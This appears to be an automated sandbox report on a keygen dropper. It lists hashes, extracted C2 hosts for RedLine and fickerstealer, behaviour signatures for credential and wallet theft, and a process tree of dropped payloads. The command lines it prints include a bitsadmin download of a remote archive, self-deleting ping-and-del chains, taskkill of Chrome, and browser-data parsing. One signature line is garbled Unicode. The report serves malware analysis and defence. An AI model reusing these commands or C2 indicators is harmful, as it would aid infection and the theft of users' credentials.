Resubmissions

24-04-2021 06:39

210424-z9rcb7aepa 10

23-04-2021 19:10

210423-eqazybfbwe 10

23-04-2021 19:10

210423-11yc7me6fe 10

23-04-2021 18:20

210423-96m9f6fxjx 10

23-04-2021 13:38

210423-fv1qhsltzj 10

23-04-2021 13:38

210423-6hhapn6pdx 10

23-04-2021 13:38

210423-m5azl6mq1s 10

23-04-2021 13:38

210423-nlvbxenam6 10

23-04-2021 13:38

210423-y4rkc8l6ts 10

23-04-2021 05:23

210423-lejp16ex1n 10

Analysis

  • max time kernel
    23s
  • max time network
    158s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    22-04-2021 17:47

Errors

Reason
Machine shutdown

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

redline

Botnet

бр23.04

C2

redworksite.info:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • rﱞﱞﱞﱞﱞﱞ ฺฺฺฺฺฺฺฺฺฺฺฺ ฺฺฺฺ ฺﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞredﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞٌٌٌٌٌٌٌٌٌٌٌٌٌٌٌٌٌٌٌٌّﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞline 2 IoCs

    redline_Stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 19 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 8 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1100
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1408
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2660
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2636
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2556
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2376
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2336
              • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:4080
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                  2⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:2620
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                    3⤵
                    • Loads dropped DLL
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:192
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3020
                  • C:\ProgramData\928377.exe
                    "C:\ProgramData\928377.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:504
                  • C:\ProgramData\5829498.exe
                    "C:\ProgramData\5829498.exe"
                    3⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Suspicious use of WriteProcessMemory
                    PID:4104
                    • C:\ProgramData\Windows Host\Windows Host.exe
                      "C:\ProgramData\Windows Host\Windows Host.exe"
                      4⤵
                      • Executes dropped EXE
                      PID:4272
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:4212
                  • C:\Users\Admin\AppData\Local\Temp\is-7VRV2.tmp\Install.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-7VRV2.tmp\Install.tmp" /SL5="$40152,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:4280
                    • C:\Users\Admin\AppData\Local\Temp\is-1DKLG.tmp\Ultra.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-1DKLG.tmp\Ultra.exe" /S /UID=burnerch1
                      4⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:4492
                      • C:\Program Files\Windows Media Player\OIVQCPPWWN\ultramediaburner.exe
                        "C:\Program Files\Windows Media Player\OIVQCPPWWN\ultramediaburner.exe" /VERYSILENT
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4680
                        • C:\Users\Admin\AppData\Local\Temp\is-HQ32J.tmp\ultramediaburner.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-HQ32J.tmp\ultramediaburner.tmp" /SL5="$7004E,281924,62464,C:\Program Files\Windows Media Player\OIVQCPPWWN\ultramediaburner.exe" /VERYSILENT
                          6⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of WriteProcessMemory
                          PID:4736
                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                            7⤵
                            • Executes dropped EXE
                            PID:4860
                      • C:\Users\Admin\AppData\Local\Temp\af-1c1b0-2c2-4e3a9-3cf4b5e204c69\Tifynodavy.exe
                        "C:\Users\Admin\AppData\Local\Temp\af-1c1b0-2c2-4e3a9-3cf4b5e204c69\Tifynodavy.exe"
                        5⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        PID:4760
                      • C:\Users\Admin\AppData\Local\Temp\7e-14feb-3d7-5fe8b-6bf1693c24d93\Calicejeja.exe
                        "C:\Users\Admin\AppData\Local\Temp\7e-14feb-3d7-5fe8b-6bf1693c24d93\Calicejeja.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:4844
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vq1gbpzc.apz\instEU.exe & exit
                          6⤵
                            PID:732
                            • C:\Users\Admin\AppData\Local\Temp\vq1gbpzc.apz\instEU.exe
                              C:\Users\Admin\AppData\Local\Temp\vq1gbpzc.apz\instEU.exe
                              7⤵
                              • Executes dropped EXE
                              PID:4432
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qwoaacz2.bux\gpooe.exe & exit
                            6⤵
                              PID:5100
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cgtxkmmp.hl4\google-game.exe & exit
                              6⤵
                                PID:5172
                                • C:\Users\Admin\AppData\Local\Temp\cgtxkmmp.hl4\google-game.exe
                                  C:\Users\Admin\AppData\Local\Temp\cgtxkmmp.hl4\google-game.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious use of SetWindowsHookEx
                                  PID:5420
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    8⤵
                                      PID:5644
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jk0bwksv.l3c\skipper.exe /s & exit
                                  6⤵
                                    PID:5320
                                    • C:\Users\Admin\AppData\Local\Temp\jk0bwksv.l3c\skipper.exe
                                      C:\Users\Admin\AppData\Local\Temp\jk0bwksv.l3c\skipper.exe /s
                                      7⤵
                                        PID:5484
                                        • C:\Users\Admin\AppData\Local\Temp\1606937436.exe
                                          C:\Users\Admin\AppData\Local\Temp\1606937436.exe
                                          8⤵
                                            PID:4976
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              9⤵
                                                PID:5464
                                            • C:\Users\Admin\AppData\Local\Temp\1254593553.exe
                                              C:\Users\Admin\AppData\Local\Temp\1254593553.exe
                                              8⤵
                                                PID:4668
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\jk0bwksv.l3c\skipper.exe & exit
                                                8⤵
                                                  PID:5812
                                                  • C:\Windows\SysWOW64\PING.EXE
                                                    ping 0
                                                    9⤵
                                                    • Runs ping.exe
                                                    PID:1540
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c2u4rggb.kwg\md1_1eaf.exe & exit
                                              6⤵
                                                PID:5888
                                                • C:\Users\Admin\AppData\Local\Temp\c2u4rggb.kwg\md1_1eaf.exe
                                                  C:\Users\Admin\AppData\Local\Temp\c2u4rggb.kwg\md1_1eaf.exe
                                                  7⤵
                                                    PID:5968
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bhqimyok.n44\askinstall36.exe & exit
                                                  6⤵
                                                    PID:6072
                                                    • C:\Users\Admin\AppData\Local\Temp\bhqimyok.n44\askinstall36.exe
                                                      C:\Users\Admin\AppData\Local\Temp\bhqimyok.n44\askinstall36.exe
                                                      7⤵
                                                        PID:6092
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                          8⤵
                                                            PID:5316
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /f /im chrome.exe
                                                              9⤵
                                                              • Kills process with taskkill
                                                              PID:5796
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4gsasjhd.5jq\KPJLBMWGLM.exe & exit
                                                        6⤵
                                                          PID:5908
                                                          • C:\Users\Admin\AppData\Local\Temp\4gsasjhd.5jq\KPJLBMWGLM.exe
                                                            C:\Users\Admin\AppData\Local\Temp\4gsasjhd.5jq\KPJLBMWGLM.exe
                                                            7⤵
                                                              PID:6136
                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                                8⤵
                                                                  PID:2648
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                    parse.exe -f json -b firefox
                                                                    9⤵
                                                                      PID:5680
                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                      parse.exe -f json -b chrome
                                                                      9⤵
                                                                        PID:5328
                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                        parse.exe -f json -b edge
                                                                        9⤵
                                                                          PID:5936
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pvc4bayg.cxe\y1.exe & exit
                                                                    6⤵
                                                                      PID:1688
                                                                      • C:\Users\Admin\AppData\Local\Temp\pvc4bayg.cxe\y1.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\pvc4bayg.cxe\y1.exe
                                                                        7⤵
                                                                          PID:6092
                                                                          • C:\Users\Admin\AppData\Local\Temp\ye1WFU9Hl3.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\ye1WFU9Hl3.exe"
                                                                            8⤵
                                                                              PID:6532
                                                                              • C:\Users\Admin\AppData\Roaming\1619113996198.exe
                                                                                "C:\Users\Admin\AppData\Roaming\1619113996198.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619113996198.txt"
                                                                                9⤵
                                                                                  PID:4888
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\ye1WFU9Hl3.exe"
                                                                                  9⤵
                                                                                    PID:3768
                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                      ping 127.0.0.1 -n 3
                                                                                      10⤵
                                                                                      • Runs ping.exe
                                                                                      PID:2204
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\pvc4bayg.cxe\y1.exe"
                                                                                  8⤵
                                                                                    PID:6584
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      timeout /T 10 /NOBREAK
                                                                                      9⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:6916
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dp4pqulo.vbb\ABCbrowser.exe /VERYSILENT & exit
                                                                                6⤵
                                                                                  PID:5940
                                                                                  • C:\Users\Admin\AppData\Local\Temp\dp4pqulo.vbb\ABCbrowser.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\dp4pqulo.vbb\ABCbrowser.exe /VERYSILENT
                                                                                    7⤵
                                                                                      PID:5476
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        8⤵
                                                                                          PID:7104
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hkysplqo.gkv\toolspab1.exe & exit
                                                                                      6⤵
                                                                                        PID:6140
                                                                                        • C:\Users\Admin\AppData\Local\Temp\hkysplqo.gkv\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\hkysplqo.gkv\toolspab1.exe
                                                                                          7⤵
                                                                                            PID:4304
                                                                                            • C:\Users\Admin\AppData\Local\Temp\hkysplqo.gkv\toolspab1.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\hkysplqo.gkv\toolspab1.exe
                                                                                              8⤵
                                                                                                PID:5796
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5hst2cab.hni\SunLabsPlayer.exe /S & exit
                                                                                            6⤵
                                                                                              PID:3124
                                                                                              • C:\Users\Admin\AppData\Local\Temp\5hst2cab.hni\SunLabsPlayer.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\5hst2cab.hni\SunLabsPlayer.exe /S
                                                                                                7⤵
                                                                                                  PID:5844
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscE5B4.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                      PID:6588
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscE5B4.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                        PID:4044
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscE5B4.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                          PID:2980
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscE5B4.tmp\tempfile.ps1"
                                                                                                          8⤵
                                                                                                            PID:6420
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscE5B4.tmp\tempfile.ps1"
                                                                                                            8⤵
                                                                                                              PID:4560
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscE5B4.tmp\tempfile.ps1"
                                                                                                              8⤵
                                                                                                                PID:7120
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscE5B4.tmp\tempfile.ps1"
                                                                                                                8⤵
                                                                                                                  PID:6416
                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                                  8⤵
                                                                                                                  • Download via BitsAdmin
                                                                                                                  PID:5676
                                                                                                            • C:\Windows\System32\cmd.exe
